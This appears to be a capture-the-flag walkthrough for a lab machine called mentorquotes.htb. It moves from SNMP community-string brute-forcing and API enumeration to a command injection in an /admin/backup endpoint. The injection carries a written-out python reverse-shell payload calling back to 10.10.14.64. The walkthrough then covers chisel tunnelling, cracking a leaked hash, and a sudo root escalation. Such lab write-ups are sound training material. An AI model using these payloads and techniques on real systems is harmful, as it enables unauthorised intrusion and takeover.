Let's start off by running nmap:

nmap -sC -sV -T4 10.129.186.55

There seems to be only port 22 and 80 open

Also, run nmap on UDP mode:

sudo nmap -sU -T4 10.129.186.55

There seems to be another port 161 open (Let's ignore the ports marked as open |filtered for now).

Port 161 seems to be running SNMP which is basically a protocol for collecting organization's network and device information. Sometimes it is possible to query information from SNMP without any kind of authentication, only something called as community string is needed, which is possible to brute force.

For this let's use a script called snmpbrute.py ,there is many options for this but this one works fine. This script identifies two community strings: internal and public.

Public is a commonly used key and normally only contains not so sensitive data so let's focus on the internal one. For querying the actual data there's many tools and one of them is snmpbulkwalk. The output is rather large so it's a good idea to forward the output to a file for easier analyzing.

snmpbulkwalk  -c internal -v2c  10.129.186.55 . > enumed.txt

A good idea would be to try to find anything sensitive such as usernames/passwords/login attempts from the generated file. Let's do that:

Theres a password! But where does it fit?

The web-page on port 80 redirect's to url http://mentorquotes.htb. After adding the entry to /etc/hosts - file the web site is available:

Scanning for directories does not yield any results, but brute forcing sub domains reveals another domain http://api.mentorquotes.htb

wfuzz -H "Host: FUZZ.mentorquotes.htb" --hc 302  -w "/opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt" http://mentorquotes.htb/ 

As the name suggests it's an api-service. After scanning the api for possible endpoints there's some juicy results:

gobuster dir -u http://api.mentorquotes.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -t 30

http://api.mentorquotes.htb/docs reveals api-documentation for the service. Most of the endpoints require auth. On top of the page there's information about the admin/creator of the service: james with email address of james@mentorquotes.htb

After testing the just found username & email with the earlier found password it would be a good idea to try login

Success!

Also, the previous api-scan revealed an endpoint that was not included in docs: /admin

The endpoint is kind enough to inform that there's two functions under admin. /admin/check is currently not implemented but /admin/backup has something under it:

running GET displays method not allowed, but how about another method like POST?

So the endpoint seems to require body-field. Let's add that:

After adding body, the endpoint tells us about another field called path which is missing. After adding the field the endpoint responds with status 200!

So basically this endpoint created a backup and want's body and path as parameters. Generating backup could be done via command line commands so let's try to inject our custom command for reverse shell. But before that, open up a Netcat listener:

nc -lnvp 9002

Here's a working payload:

{

"body" :"testing",

"path" : "/tmp/asd.sh;python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.64\",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';"

}

Success!

The machine the api-service is running on seems to be a docker container so next step is to pivot to the actual machine. Sourcecode of the application is on /app-folder.

Sourcecode of the application reveals that the service uses postgresql as a database.

Next step is to enumerate that. Docker containers usually are pretty bare boned so to access database it is required to tunnel our traffic through the docker-machine since the database is only available via there.

For that chisel is a perfect tool. To star chisel on local machine, run:

./chisel server -p 8005 -reverse -v

And on server:

./chisel client 10.10.14.64:8005 R:5432:172.22.0.1:5432

Now, psql database can be accessed on 127.0.0.1:5432 Note: port 5432 is default port for psql

Database contains another user svc@mentorquotes.htb with password hash: 53f22d0dfa10dce7e29cd31f4f953fd8

This can be cracked via hashcat, just add the hash to hash.txt file first.

Credentials for svc:123meunomeeivani . These are also valid ssh-credentials on the main machine.

Enumerating the actual machine with linpeas reveals two interesting things: 1) There is another user called james on the machine, 2) the location of snmp-service config file.

This file contains another password:

This is also a password for user james. After changing to james sudo -l reveals that james can run /bin/sh as sudo, which basically makes james a root user.